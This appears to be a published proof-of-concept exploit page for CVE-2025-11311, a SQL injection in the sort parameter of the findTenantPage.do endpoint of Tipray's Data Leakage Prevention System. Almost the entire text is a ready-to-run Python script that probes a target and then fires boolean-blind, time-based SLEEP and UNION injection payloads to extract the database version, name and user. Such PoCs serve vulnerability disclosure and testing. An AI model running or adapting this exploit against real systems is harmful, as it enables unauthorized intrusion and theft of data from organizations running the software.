CVE-2025-11311：天锐数据泄露防护系统SQL注入漏洞

# CVE-2025-11311 PoC - SQL Injection in Tipray DLP System # Vulnerability: SQL Injection via sort parameter in findTenantPage.do # Affected: Tipray Data Leakage Prevention System v1.0 import requests target_url = "http://target-host:8080" endpoint = "/findTenantPage.do" # Normal request to verify the endpoint is accessible def check_endpoint(): url = f"{target_url}{endpoint}" params = { "page": "1", "limit": "10", "sort": "id" } try: resp = requests.get(url, params=params, timeout=10) print(f"[+] Endpoint status: {resp.status_code}") return resp.status_code == 200 except Exception as e: print(f"[-] Connection error: {e}") return False # Boolean-based blind SQL injection via sort parameter def exploit_blind_injection(): url = f"{target_url}{endpoint}" # Inject ORDER BY clause with CASE WHEN for boolean-based blind injection payload = "id,(CASE WHEN (1=1) THEN id ELSE (SELECT 1 UNION SELECT 2) END)" params = { "page": "1", "limit": "10", "sort": payload } try: resp_true = requests.get(url, params=params, timeout=10) payload_false = "id,(CASE WHEN (1=2) THEN id ELSE (SELECT 1 UNION SELECT 2) END)" params["sort"] = payload_false resp_false = requests.get(url, params=params, timeout=10) if resp_true.status_code != resp_false.status_code or resp_true.text != resp_false.text: print("[+] Target is vulnerable to SQL injection!") return True else: print("[-] Target may not be vulnerable") return False except Exception as e: print(f"[-] Exploit error: {e}") return False # Time-based blind SQL injection def exploit_time_based(): url = f"{target_url}{endpoint}" # Using IF/SLEEP for time-based detection payload = "id,IF(1=1,SLEEP(5),0)" params = { "page": "1", "limit": "10", "sort": payload } try: resp = requests.get(url, params=params, timeout=15) if resp.elapsed.total_seconds() >= 5: print("[+] Time-based SQL injection confirmed!") return True else: print("[-] Time-based injection not detected") return False except Exception as e: print(f"[-] Time-based exploit error: {e}") return False # UNION-based SQL injection to extract data def exploit_union_injection(): url = f"{target_url}{endpoint}" # Attempt UNION-based injection to extract database version payload = "1 UNION SELECT 1,version(),database(),user(),5,6,7,8,9,10--" params = { "page": "1", "limit": "10", "sort": payload } try: resp = requests.get(url, params=params, timeout=10) if resp.status_code == 200 and ("MySQL" in resp.text or "Oracle" in resp.text or "PostgreSQL" in resp.text): print("[+] UNION injection successful!") print(f"[+] Response: {resp.text[:500]}") return True except Exception as e: print(f"[-] UNION exploit error: {e}") return False if __name__ == "__main__": print("[*] CVE-2025-11311 - Tipray DLP SQL Injection PoC") print("[*] Checking target...") if check_endpoint(): print("[*] Attempting blind injection...") exploit_blind_injection() print("[*] Attempting time-based injection...") exploit_time_based() print("[*] Attempting UNION injection...") exploit_union_injection()